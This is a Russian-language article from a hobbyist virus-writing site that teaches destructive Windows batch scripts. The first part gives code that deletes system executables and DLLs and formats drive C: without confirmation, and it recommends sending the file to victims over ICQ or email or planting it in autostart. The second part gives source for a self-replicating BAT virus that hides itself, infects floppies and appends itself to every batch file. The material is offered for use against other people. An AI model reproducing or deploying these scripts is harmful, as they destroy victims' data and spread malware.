Грохаем windows - Bat Скрипты - Каталог статей - Вирусология, взгляд из Delphi
Понедельник, 05.12.2016, 23:42 Приветствую вас Гость | Группа "Гости" 


Меню сайта

Категории раздела
Delphi [94]
Программирование
HTML [2]
Теги и примеры
Bat Скрипты [21]
Различные скрипты
Разное [7]
Всё что не вошло в основные разделы

Администрация
000000 dolphin

Помощь проекту

R106276538945
Z160640024212

Яндекс деньги
410011190732605

Недавние темы

Опрос
Стоит ли сменить дизайн сайта?
Всего ответов: 423

Главная » Статьи » Bat Скрипты

Грохаем windows
Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл
Cd C: -команда перехода на диск C где почти у всех кампах стоит виндовс
Сd windows -переходим в папку Windows (у 95% ламеров и юзеров папка называется именно так)
Большой минус бат файлов да и ДОСа в частности это то что нельзя удалять сразу папку с файлами, а нужно заходить в каждую папку отдельно и удалять там файлы.!!!
del *.exe -удаяем все файлы с расширением .exe
del *.ini -удаяем все файлы с расширением .ini
del *.com -удаяем все файлы с расширением .com
cd\
cd windows
cd system
del *.dll
del *.exe
После этих простеньких строчек у юзера или ламера будет примерно 30 минут работы!)
Код полностью:

Cd\
Cd C:
Сd windows
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe


Но вдруг папка виндовс называется не windows а например winMe, или win98, да без проблем, просто надо будет после этого кода написать ниже ещё один только чтобы папка называлась winMe и так далее.

Код полностью:

Cd\
Cd C:
Сd winMe
Del *.exe
Del *.ini
Del *.com
Cd\
Cd win98
Cd system
Del *.dll
Del *.exe

и так далее! Как вы понимаете таким образом можно грохнуть все что угодно на чужом винте! Только помните, что такое можно делать если на машине жертвы стоит Windows 9Х!!!
Люблю прикалывать ламеров, это форматирование диска С:\
Форматируем диск С:\
Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл
Format C:\ -команда форматирования диска
С:\ Y -команда автоматического согласие форматирование диска без ведома или подтверждения команды ламером
Y -тоже самое
Y -уже говорил
Хе! Вот и все…
Код полностью:

Cd\
Format C:\
Y
Y
Y


Единственный минус! Такой код может не сработать если на кампе стоит Windows ME или XP! Придется писать другой путь. В этих форточках команда форматирования лежит не просто в папке Windows, а по следующему пути
C:\WINDOWS\COMMAND\format c:
но само сабой форматироваться не будет, а потребует потверждение и простая команда
Y
Y
Y
не поможет, нужена другая. Просто добавим параметр /autotest

C:\WINDOWS\COMMAND\format c: /autotest

В данном случае, подтверждать ничего не придется.

Как и где это применить?
Просто отсылаете бат фаил какому нибудь юзверю по аське или на мыло.
При открытие файла, начнёца процесс.
Так что не советую открывать фаил у себя на компе.

Если Вы залезли на удаленный компьютер то можете тоже злостно пошутить.
Но как сделать так, чтобы файл запустился автоматически?
Лазив по компу жертвы Вам вдруг захотелось форматнуть его винт, ну мало ли, вдруг он какой нибудь нацист или педофил! Разумеется Вы не сможите запустить файл со своего компа на компе жертвы. Но всёже есть пару вариантов. Первый, это загрузить файл в автозагрузку по пути

C:\windows (или как там будет папка называться)\Главное меню \ Программы \Автозагрузка или переименовать Ваш батик в Autoexec.bat и загрузить в корневой С:\



ЧАСТЬ 2

@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat

Этот вирус заражает винчестер, оставляя только один файл virus.bat.
Но все-таки я бы не сказал что это полноценный вирус, т.к. он лишен
возможности заражать другие компьютеры. Чтобы этот BAT-вирус обрел
более четкие очертания дополним его возможностью заражать другие ПК:

@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul

В этом примере появляется строка, которая дает возможность вирусу
заражать дискеты. Смысл этого в том что если при перезагрузке ПК в
дисководе будет дискета, то она будет заражена.
Конечно файл virus.bat в корневом диске C: будет сильно мозолить
глаза юзеру, чтобы этого не было существует программа attrib.
Преобразуем вирус:

@Echo off
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul

Если вы внимательны, то вы уже поняли, что вызов файла virus.bat в
autoexec.bat будет записываться каждый раз при перезагрузке ПК.
Чтобы этого не произошло есть простой способ: после записи вызова
надо с помощью программы attrib установить атрибут только чтение у
autoexec.bat. А есть другой вариант, он немного посложнее, но

гораздо грамотнее:

@Echo off
if exist c:virus.bat goto cool
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
:cool
copy %0 a:run.bat >nul

Здесь вторая строка проверяет существует ли уже файл c:virus.bat и
если он уже существует, то происходит переход к метке cool. Этот
способ тоже очень прост. Явный недостаток - если юзер уберет вызов
из autoexec.bat, а файл virus.bat оставит, то глупый вирус будет
нагло обманут. Чтобы вирус был умнее, то надо использовать программу
find, если вам будет не лень с ней разбираться, то вы сможете
написать более сложный BAT-вирус, который будет заражать не один

файл c:autoexec.bat, а все *.BAT.

Пример:
@echo off%[MeTrA]%
if '%1=='In_ goto MeTrAin
if exist c:MeTrA.bat goto MeTrAru
if not exist %0 goto MeTrAen
find "MeTrA"<%0>c:MeTrA.bat
attrib +h c:MeTrA.bat
:MeTrAru
for %%t in (*.bat) do call c:MeTrA In_ %%t
goto MeTrAen
:MeTrAin
find "MeTrA"<%2>nul
if not errorlevel 1 goto MeTrAen
type c:MeTrA.bat>>%2

:MeTrAen


Смысл заражения таков: в вирусе каждая строчка имеет метку, в данном
примере она MeTrA. Например, в первой строке эта метка ничего не
делает, во второй строке эта метка, как бы, не является пассивной,
она используется для внутренней работы вируса, а именно участвует в
названии метки. При запуске вирус проверяет, есть ли файл
C:METRA.BAT, если нет, то вирус создает его и с помощью программы
find копирует из файла (из которого стартовал) все строки содержащие
метку вируса, т.е. копирует только вирусные строки. Так, вирусные
строки скопированы. Значит в файле C:METRA.BAT теперь находится
копия вируса. Далее вирус ищет BAT-файлы. Чтобы не происходило
повторного заражения используется все таже программа find. Допустим
вирус нашел файл RUN.BAT и он оказался еще не заражен, тогда вирус
вызывает файл C:METRA.BAT с такими параметрами: In_ RUN.BAT, здесь
первый параметр In_ говорит вирусу, что надо заразить файл, имя
которого указано во-втором параметре, в данном случае он RUN.BAT.
Вирус в C:METRA.BAT заражает файл RUN.BAT простейшим способом - с
помощью команды type дописывает к файлу RUN.BAT себя. Вот так файл
RUN.BAT оказывается зараженным.

Категория: Bat Скрипты | Добавил: dolphin (28.12.2010)
Просмотров: 5254 | Комментарии: 3 | Рейтинг: 4.3/6

Всего комментариев: 3
avatar
1
ААА, исправь ошибку в названии. Глаза режет smile
avatar
2
зачем же так все усложнять и писать такой большой код когда грохнуть винду можно всего двумя командами, я сейчас кстати не имею ввиду формат жесткого диска с виндой, просто в виндовс есть файл, точно не помню его название, отвечает за запуск винды, его удаляем и все...,хотя после такого метода может спасти установочный диск с виндой,если же вам интересен более жестокий и зловредный метод то приведенный выше код то что вам нужно... biggrin
avatar
3
Еще одно чудо в текстовике....
avatar
Профиль


Логин:
Пароль:

Поиск

Наша кнопка

Вирусология, взгляд из Delphi



Статистика
HSDN :: Рейтинг сайтов WOlist.ru - каталог качественных сайтов Рунета Яндекс.Метрика Счетчик тИЦ и PR
Статистика материалов
Файлов: 364
Форум: 1128/7979
Коментариев: 759
Новостей: 27

Статистика пользователей
Всего: 409
За неделю: 2
Вчера: 0
Сегодня: 0
Всего онлайн: 1
Гостей: 1
Пользователей: 0

delfcode.ru © 2008 - 2016 Хостинг от uCoz